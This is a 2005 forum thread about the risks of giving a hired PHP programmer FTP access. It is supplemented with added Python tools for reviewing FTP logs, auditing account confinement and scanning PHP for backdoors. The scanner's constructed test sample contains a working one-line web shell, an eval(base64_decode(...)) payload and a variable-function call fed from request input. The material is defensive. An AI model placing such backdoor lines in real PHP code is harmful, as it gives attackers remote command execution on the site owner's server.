providing server details to a hired programmer?

#1  Junior Member (joined Oct 2005, 5 posts)

Hi guys, first-time poster here, and I am glad I found this site. My question might sound silly, but because of my inexperience my next actions could be a big mistake on my part.

I have hired a programmer to write a PHP script for me because I would have absolutely no idea where to start if I had to do this myself, but I am having difficulties installing the script so that everything works properly.

The hired programmer offered to help out and asked if I could provide the login details for the FTP account so he can upload, take a look at what I did wrong and adjust the whole thing so that I can review it and learn from my mistakes.

But can this situation be exploited in a harmful manner?
There is nothing special on the server yet, and in the future I would change the password when I upload the site I have been working on.

But could some kind of malware be installed without me ever knowing it, so that by granting him the login details I would be cutting off my own hands, so to speak?

    Advice please?

#2  CXGJarrod, AO Decepticon (joined Jul 2002, 2,038 posts)

    Depending on how much work he is doing for you, you might want to get him to sign an NDA.
    N00b> STFU i r teh 1337 (english: You must be mistaken, good sir or madam. I believe myself to be quite a good player. On an unrelated matter, I also apparently enjoy math.)

#3  the_JinX, Leftie Linux Lover, Beverwijk, Netherlands (joined Nov 2001, 2,534 posts)

Yup. Get your company's lawyer to help you out with the details.

It will save you a lot of worries.
    ASCII stupid question, get a stupid ANSI.
    When in Russia, pet a PETSCII.

    Get your ass over to SLAYRadio the best station for C64 Remixes !

#4  Nokia, Right turn Clyde, Button Moon (joined Aug 2003, 1,696 posts)

Is he from a professional firm, or is he just a "friend of a friend"?

He can do damage if he has complete, unrestricted access to your FTP server.

You can always scan your FTP server afterwards if you feel he has put something untoward on it. Examine your logs afterwards to see if he uploaded or downloaded any files, or better yet, be there while he is doing his work on it: ask him to come into your office to do it, so that you can be at his side and keep an eye on what he is doing.

Make a directory for him and only give him rights to that particular directory; copy the PHP program into his directory so he can work on it there.

And obviously, it goes without saying: remove the login details he used afterwards!
    Drugs have taught an entire generation of kids the metric system.

    http://tazforum.**********.com/
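Nokia's two practical suggestions above, examine the logs afterwards and confine him to one directory, can be turned into a concrete check. The following is an added example, not code from the thread or from any poster: it parses a transfer log in the xferlog format that wu-ftpd, ProFTPD and vsftpd write, and reports what one account uploaded and downloaded, from which hosts, whether any transfer was cut short, and whether it wrote anything outside the directory it was given. The log lines, the account name `contractor`, the directory `/home/contractor` and the access window are all constructed for illustration.

```python
"""Review an FTP transfer log for everything one account did.

Added example (not from the thread). Parses xferlog-format lines and reports
what a given account uploaded/downloaded, optionally inside the time window
during which it was allowed on. All sample data below is constructed.
"""
from datetime import datetime
from typing import Dict, List, Optional

# Constructed sample log. Field order follows xferlog(5): five timestamp
# tokens, transfer-time, remote-host, file-size, filename, transfer-type,
# special-action-flag, direction (i=incoming/upload, o=outgoing/download,
# d=delete), access-mode, username, service-name, authentication-method,
# authenticated-user-id, completion-status (c=complete, i=incomplete).
SAMPLE_XFERLOG = """\
Wed Oct 12 13:58:10 2005 1 203.0.113.5 2310 /home/contractor/install.php b _ o r contractor ftp 0 * c
Wed Oct 12 14:03:01 2005 1 203.0.113.5 4096 /home/contractor/install.php b _ i r contractor ftp 0 * c
Wed Oct 12 14:05:44 2005 2 203.0.113.5 18873 /home/contractor/lib/helpers.php b _ i r contractor ftp 0 * c
Wed Oct 12 14:06:02 2005 1 203.0.113.5 511 /var/www/html/.htaccess a _ i r contractor ftp 0 * c
Wed Oct 12 15:30:00 2005 1 198.51.100.7 900 /home/owner/index.html a _ i r owner ftp 0 * c
Thu Oct 13 09:00:00 2005 1 203.0.113.5 4096 /home/contractor/install.php b _ o r contractor ftp 0 * i
"""

# Assumed: the hour during which the contractor was told he could log in.
ACCESS_WINDOW = (datetime(2005, 10, 12, 14, 0), datetime(2005, 10, 12, 15, 0))

DIRECTION = {"i": "upload", "o": "download", "d": "delete"}


def parse_xferlog(text: str) -> List[Dict]:
    """Turn xferlog lines into dicts. xferlog does not quote spaces in file
    names, so a line that does not split into exactly 18 tokens is skipped
    rather than risk attributing the wrong field to the wrong column."""
    records = []
    for line in text.splitlines():
        f = line.split()
        if len(f) != 18:
            continue
        records.append({
            "time": datetime.strptime(" ".join(f[:5]), "%a %b %d %H:%M:%S %Y"),
            "host": f[6],
            "size": int(f[7]),
            "path": f[8],
            "direction": DIRECTION.get(f[11], f[11]),
            "user": f[13],
            "complete": f[17] == "c",
        })
    return records


def transfers_by(records: List[Dict], user: str,
                 start: Optional[datetime] = None,
                 end: Optional[datetime] = None) -> List[Dict]:
    """Every transfer the account made, limited to [start, end] when given."""
    return [r for r in records
            if r["user"] == user
            and (start is None or r["time"] >= start)
            and (end is None or r["time"] <= end)]


def writes_outside(records: List[Dict], user: str, allowed_dir: str) -> List[str]:
    """Paths the account uploaded or deleted outside the directory it was
    given. Anything listed here is the first thing to inspect."""
    prefix = allowed_dir.rstrip("/") + "/"
    return sorted({r["path"] for r in records
                   if r["user"] == user
                   and r["direction"] in ("upload", "delete")
                   and not r["path"].startswith(prefix)})


def summarize(records: List[Dict], user: str, allowed_dir: str,
              start: Optional[datetime] = None,
              end: Optional[datetime] = None) -> Dict:
    """One-screen review of an account's activity."""
    mine = transfers_by(records, user, start, end)
    return {
        "uploads": sum(1 for r in mine if r["direction"] == "upload"),
        "downloads": sum(1 for r in mine if r["direction"] == "download"),
        "hosts": sorted({r["host"] for r in mine}),
        "outside_sandbox": writes_outside(mine, user, allowed_dir),
        "incomplete": [r["path"] for r in mine if not r["complete"]],
    }


if __name__ == "__main__":
    recs = parse_xferlog(SAMPLE_XFERLOG)
    for key, value in summarize(recs, "contractor", "/home/contractor", *ACCESS_WINDOW).items():
        print(f"{key}: {value}")
    # Activity outside the agreed window is its own finding:
    late = transfers_by(recs, "contractor", ACCESS_WINDOW[1])
    print("after window:", [(r["time"].isoformat(), r["path"]) for r in late])
```

Run against the constructed log, the summary shows three uploads during the window, one of them (`/var/www/html/.htaccess`) outside the delegated directory, plus a download attempt the next day, after the access should have been removed. On a real server the log lives wherever the daemon's `xferlog_file` (vsftpd) or `TransferLog` (ProFTPD) setting points; keep a copy of it before the contractor logs in, since an account with a shell can edit logs it can reach.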

#5  Senior Member (joined Jan 2003, 3,914 posts)

    Hey Hey,

As others have mentioned, an NDA is definitely the first thing you want to do.

As far as releasing the credentials to the FTP... I personally wouldn't do it. If it's just a page of PHP, there's no installing to be done; it's just a matter of uploading it. You could download the entire site and provide him with an archive containing all the files.

Is this your own server, a company server, or do you pay for hosting? If it's your own server or a company server, make sure you don't give him credentials that are also a valid login for telnet/SSH, if you have those services running and decide to give him access. Also, if it's hosting you pay for, be advised that usually the cPanel, Usermin or whatever management system you use has the same password as your FTP account, meaning he'll have full access to your hosting, which, if it's like certain ones I have, could contain credit card details.

Nokia asked a good question about how you met him. I've done work for a number of people, some who ran across business websites I've had, and others who were friends of a friend or relatives of a friend, and the work experience is different in each case.

Does the server have PHP on it? If it doesn't, that could be a good reason why the script doesn't work.

Before you do anything, ask him to justify how having FTP access will assist him and what he hopes to accomplish with the access. Let us know what you find out.

    Peace,
    HT
    IT Blog: .:Computer Defense:.
    PnCHd (Pronounced Pinched): Acronym - Point 'n Click Hacked. As in: "That website was pinched" or "The skiddie pinched my computer because I forgot to patch".
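HT's warning that an FTP password may also be a valid telnet/SSH login is easy to verify on your own server, and so is Nokia's point about confining the account to one directory. The following is an added example, not code from the thread or from any poster: it reads `/etc/passwd`-style lines and a `vsftpd.conf`-style configuration and reports, for one account, whether its shell permits an interactive login and whether vsftpd will chroot it. Both inputs are constructed; the account name `contractor`, the file paths and the chroot list contents are assumptions, and the chroot rule implements the documented vsftpd semantics of `chroot_local_user` and `chroot_list_enable`.

```python
"""Audit an FTP-only account: no shell login, confined to its own directory.

Added example (not from the thread). All inputs below are constructed.
"""
from typing import Dict, List, Set

# Shells that refuse an interactive login on common Linux/BSD systems (assumed paths).
NOLOGIN_SHELLS = {"/sbin/nologin", "/usr/sbin/nologin", "/bin/false", "/usr/bin/false"}

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
owner:x:1000:1000:Site owner:/home/owner:/bin/bash
contractor:x:1001:1001:Hired PHP dev:/home/contractor:/bin/bash
ftponly:x:1002:1002:FTP-only dev:/home/ftponly:/sbin/nologin
"""

SAMPLE_VSFTPD_CONF = """\
listen=YES
local_enable=YES
write_enable=YES
# chroot_local_user=YES   (commented out: nobody is confined unless listed below)
chroot_list_enable=YES
chroot_list_file=/etc/vsftpd.chroot_list
"""

# Constructed contents of the chroot_list_file named above.
SAMPLE_CHROOT_LIST: Set[str] = {"ftponly"}


def parse_passwd(text: str) -> Dict[str, Dict[str, str]]:
    """user -> {uid, home, shell} from passwd(5) lines; malformed lines skipped."""
    users = {}
    for line in text.splitlines():
        parts = line.split(":")
        if len(parts) != 7:
            continue
        users[parts[0]] = {"uid": parts[2], "home": parts[5], "shell": parts[6]}
    return users


def parse_vsftpd_conf(text: str) -> Dict[str, str]:
    """key -> value from KEY=VALUE lines; comments and blanks ignored."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        conf[key.strip()] = value.strip()
    return conf


def is_chrooted(conf: Dict[str, str], chroot_list: Set[str], user: str) -> bool:
    """vsftpd rule: chroot_local_user=YES confines every local user; when
    chroot_list_enable=YES the listed users are the exception to that default
    (confined if the default is open, exempt if the default is confined)."""
    default_confined = conf.get("chroot_local_user", "NO").upper() == "YES"
    list_enabled = conf.get("chroot_list_enable", "NO").upper() == "YES"
    if list_enabled and user in chroot_list:
        return not default_confined
    return default_confined


def audit_ftp_account(passwd: Dict[str, Dict[str, str]], conf: Dict[str, str],
                      chroot_list: Set[str], user: str, expected_home: str) -> List[str]:
    """Findings for one account; an empty list means it passed all checks."""
    entry = passwd.get(user)
    if entry is None:
        return [f"{user}: no such account"]
    findings = []
    if entry["shell"] not in NOLOGIN_SHELLS:
        findings.append(f"{user}: shell is {entry['shell']}; the FTP password is also "
                        "a valid SSH/telnet login wherever those services run")
    if entry["home"] != expected_home:
        findings.append(f"{user}: home is {entry['home']}, expected {expected_home}")
    if not is_chrooted(conf, chroot_list, user):
        findings.append(f"{user}: not chrooted by vsftpd, so it can browse the whole filesystem")
    return findings


if __name__ == "__main__":
    passwd = parse_passwd(SAMPLE_PASSWD)
    conf = parse_vsftpd_conf(SAMPLE_VSFTPD_CONF)
    for account in ("contractor", "ftponly"):
        for finding in audit_ftp_account(passwd, conf, SAMPLE_CHROOT_LIST,
                                         account, f"/home/{account}") or [f"{account}: ok"]:
            print(finding)
```

On the constructed input the `contractor` account fails twice (it has `/bin/bash` and is not in the chroot list) while `ftponly` passes. Two caveats when applying this for real: vsftpd 3.x refuses to chroot a user whose chroot root is writable unless `allow_writeable_chroot=YES` is set, so the usual layout is a non-writable home with a writable subdirectory for the uploads; and if the hosting panel shares the FTP password, as HT notes, no server-side setting limits what that password unlocks.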

#6  Junior Member (joined Oct 2005, 5 posts)

Thanks, guys, for your replies. The site in question is a personal site and does not belong to a company.
I'm kind of wary of the whole situation; I acquired the services of the programmer through an online service.

Would it be better for me to ask for more specific instructions on how I should install the script myself?

#7  Nokia, Right turn Clyde, Button Moon (joined Aug 2003, 1,696 posts)

I would definitely go with what HT said and ask him why he wants FTP access and what he will do with it if he gets it.

#8  Junior Member (joined Oct 2005, 5 posts)

Thanks, guys, for your support.

#9  Senior Member (joined Jan 2002, 1,207 posts)

    Bear in mind, that you should get people who do work for you to sign an NDA and general contract.

    Even without any access to your production server, you still have to trust your programmer to write code competently and not create any backdoors - which of course would give them access anyway.

    If you don't trust someone, don't let them write PHP code for you, and don't give them access to your server either. They are equivalent.

    Slarty
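Slarty's point is that the delivered code needs the same trust as the server login, because a backdoor in the script grants access anyway. A review of the delivered PHP before it goes anywhere near the server is the practical counterpart. The following is an added example, not code from the thread or from any poster: a small triage scanner that flags PHP lines calling functions that execute code or commands, and rates them higher when the same line reads request input, which is the classic shape of a web shell. It is a review aid, not a proof of safety; obfuscated code can slip past it, which is exactly why the trust question does not go away. The two PHP samples are constructed.

```python
"""Triage delivered PHP for backdoor-style constructs before uploading it.

Added example (not from the thread). The PHP below is constructed; the
function list is a starting point, not a complete catalogue.
"""
import re
from typing import Dict, List

# Functions that turn data into code or run commands, plus common payload decoders.
SINKS = re.compile(r"\b(eval|assert|system|exec|shell_exec|passthru|popen|proc_open|"
                   r"create_function|base64_decode|gzinflate|str_rot13)\s*\(", re.I)
# Request-controlled input on the same line raises the severity.
SOURCES = re.compile(r"\$_(GET|POST|REQUEST|COOKIE|SERVER)\b", re.I)
# Variable functions: $f($x) or $_GET['c']($x) call whatever name the input holds.
DYNAMIC_CALL = re.compile(r"\$\w+\s*\(|\$_\w+\[[^\]]*\]\s*\(")
# preg_replace with the /e modifier evaluates the replacement as PHP.
PREG_E = re.compile(r"preg_replace\s*\(\s*['\"].*/[a-z]*e[a-z]*['\"]", re.I)

BENIGN_PHP = """\
<?php
// Contact form handler (constructed)
$name = htmlspecialchars($_POST['name'] ?? '', ENT_QUOTES, 'UTF-8');
$msg  = htmlspecialchars($_POST['message'] ?? '', ENT_QUOTES, 'UTF-8');
if ($name !== '' && $msg !== '') {
    mail('owner@example.com', 'Contact form', "$name wrote:\\n$msg");
}
echo 'Thanks';
"""

BACKDOORED_PHP = """\
<?php
// Looks like a helper, but line 4 is a web shell and line 6 hides a payload (constructed)
function tidy($s) { return trim($s); }
if (isset($_REQUEST['cmd'])) { echo shell_exec($_REQUEST['cmd']); }
$cfg = tidy($_GET['t'] ?? '');
eval(base64_decode('ZWNobyAnaGknOw=='));
$fn = $_POST['f']; $fn('payload');
"""


def scan_php(source: str) -> List[Dict]:
    """One finding per suspicious line: number, what matched, severity, text."""
    findings = []
    for n, line in enumerate(source.splitlines(), 1):
        stripped = line.strip()
        if stripped.startswith(("//", "#", "/*", "*")):
            continue  # whole-line comments; strings are still scanned, over-reporting is fine
        sink = SINKS.search(line)
        dyn = DYNAMIC_CALL.search(line)
        pe = PREG_E.search(line)
        if not (sink or dyn or pe):
            continue
        if sink:
            what = sink.group(1).lower()
        elif dyn:
            what = "dynamic call"
        else:
            what = "preg_replace /e"
        severity = "high" if SOURCES.search(line) else "review"
        findings.append({"line": n, "what": what, "severity": severity, "text": stripped})
    return findings


def scan_report(name: str, source: str) -> Dict[str, int]:
    """Print findings for one file and return counts by severity."""
    counts = {"high": 0, "review": 0}
    for f in scan_php(source):
        counts[f["severity"]] += 1
        print(f"{name}:{f['line']}: [{f['severity']}] {f['what']}: {f['text']}")
    return counts


if __name__ == "__main__":
    print("benign:", scan_report("contact.php", BENIGN_PHP))
    print("backdoored:", scan_report("helper.php", BACKDOORED_PHP))
```

On the constructed samples the contact form produces no findings, while the "helper" produces three: the `shell_exec` fed from `$_REQUEST` and the variable function fed from `$_POST` are rated high, and the `eval(base64_decode(...))` is flagged for manual review because nothing on that line reads request input, yet there is no honest reason for a form handler to decode and execute a string. Anything rated high is a reason to stop and ask the programmer to explain the line, not to upload it and hope.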
